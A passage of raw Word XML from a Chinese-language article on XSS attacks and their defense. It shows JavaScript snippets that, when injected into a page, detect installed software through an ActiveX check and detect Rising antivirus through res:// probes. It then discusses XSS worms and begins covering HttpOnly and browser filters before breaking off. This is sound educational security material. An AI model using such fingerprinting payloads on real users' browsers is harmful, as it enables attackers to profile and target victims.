          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F54E13" w:rsidRPr="00F41A4C" w:rsidRDefault="00F54E13" w:rsidP="00F54E13">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="86" w:afterAutospacing="0" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4572000" cy="1664970"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="46" name="图片 15" descr="http://up.2cto.com/2012/1223/201212231224203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up.2cto.com/2012/1223/20121223122420312.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId266" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="1664970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>11</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这个信息中告诉了我们以上关心的两个信息，一个是浏览器的类型和版本，另外一个是客户端环境操作系统的版本。</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浏览器：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>MSIE 8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>（微软</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>浏览器，浏览器版本是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>8.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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操作系统：</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Windows NT 6.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>（操作系统类型是</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>windows 7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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通过以上方式可以获取客户端的浏览器和操作系统信息，接下来我们在继续判断客户端环境组件安装情况。构造代码如下：</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&lt;script&gt;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try{</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 var object = new ActiveXObject("XunLeiBHO.ThunderIEHelper");</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 catch(e){ alert("</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>迅雷软件未安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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&lt;/script&gt;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客户端环境中如果安装迅雷下载软件的话，那么就会安装相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>控件</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XunLeiBHO.ThunderIEHelper</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>，以上脚本的作用即是通过网页脚本去加载迅雷的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>控件，如果控件存在则不会抛出异常，否则就会抛出异常并被脚本捕获，运行上面的脚本代码时，安装有迅雷的环境不会有任何提示，未安装迅雷的环境就会弹窗提示</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>迅雷软件未安装</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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控件判断可以通过网页加载</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>ActiveX</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>控件的方式实现，那么怎么通过脚本判断客户端环境中是否安装了安全软件呢？这里我们以瑞星安全软件为例，分析描述如何通过</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跨站脚本攻击漏洞的利用检测客户端环境是否存在瑞星安全软件。我们构造代码如下：</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&lt;script&gt;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var havesoft=false;</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var disk=['c','d'];</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lastRenderedPageBreak/>
        <w:t>var soft=[':\\Program Files\\Rising\\Ris\\BackRav.dll/2/30994'];</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for(i=0;i&lt;soft.length;i++)</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    for(j=0;j&lt;disk.length;j++)   </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 {     var img=new Image();</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  res='res://'+disk[j]+soft[i];</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  img.src=res;</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  if(img.height!=30)</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  {   </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   havesoft=true;   </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  }   </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 }  </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&lt;/script&gt;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以上代码的作用是通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>结合</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>res</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>协议对客户端环境中的资源文件进行加载，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>javascript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>脚本运行后，会对客户端环境的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>C</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>盘进行访问，访问是否存在瑞星默认安装路径的资源文件，并尝试对资源文件进行加载，如果加载成功，则说明资源文件存在，也说明瑞星安全软件的存在，并将变量</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>havesoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>置为真，脚本检测结束后，只需要检测该变量是否为真即可。</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS Worm</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相对于以上三种情况，可以说是</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蠕虫（</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS Worm</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>）的破坏力和影响力都是巨大的。</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蠕虫主要发生在用户之间存在交互行为的页面中，当</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>应用程序对用户输入的数据信息没有做严格的过滤时，通过结合</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的异步提交，就可以实现在植入恶意代码的同时，将恶意代码进行对外发送，即实现了代码的感染和传播，也就形成了</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蠕虫。</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谈到</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蠕虫就很有必要介绍一下新浪微博遭受</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蠕虫攻击事件，同时我们也以此次攻击事件作为例子，对黑客恶意利用漏洞至</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蠕虫大范围扩散的过程进行详细分析和描述，并对该</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蠕虫的恶意脚本文件进行一下简要的分析。</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此处请参见拙作《</w:t>
      </w:r>
      <w:hyperlink r:id="rId267" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>从新浪微博被攻击事件看</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>SNS</w:t>
        </w:r>
        <w:r w:rsidRPr="00F41A4C">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>网站的安全问题（下）</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>》，不再赘述。</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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击的防范</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通过以上针对不同种情况的</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跨站脚本攻击的描述，我们了解到了在复杂的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>环境中，</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的利用是千变万化的，如何能够有效地防范</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跨站脚本攻击问题一直都是浏览器厂商和网站安全技术人员关注的热门话题。现在很多浏览器厂商都在自己的程序中增加了防范</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跨站脚本攻击的措施，如</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IE</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>浏览器从</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>IE8</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>开始内置了</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筛选器，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Firefox</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>也有相应的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>CSP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Noscript</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>扩展等。</w:t>
      </w:r>
      <w:r w:rsidRPr="000506AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>而对于网站的安全技术人员来说，提出高效的技术解决方案，保护用户免受</w:t>
      </w:r>
      <w:r w:rsidRPr="000506AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="000506AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击才是关键。下面我们结合网站安全设计，描述一下如何通过技术手段实现</w:t>
      </w:r>
      <w:r w:rsidRPr="000506AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r w:rsidRPr="000506AA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>跨站脚本攻击的防范</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w: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Style w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HttpOnly</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HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>最初是由微软提出的，目前已经被多款流行浏览器厂商所采用。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>的作用不是过滤</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跨站脚本攻击，而是</w:t>
      </w:r>
      <w:r w:rsidRPr="003206A5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
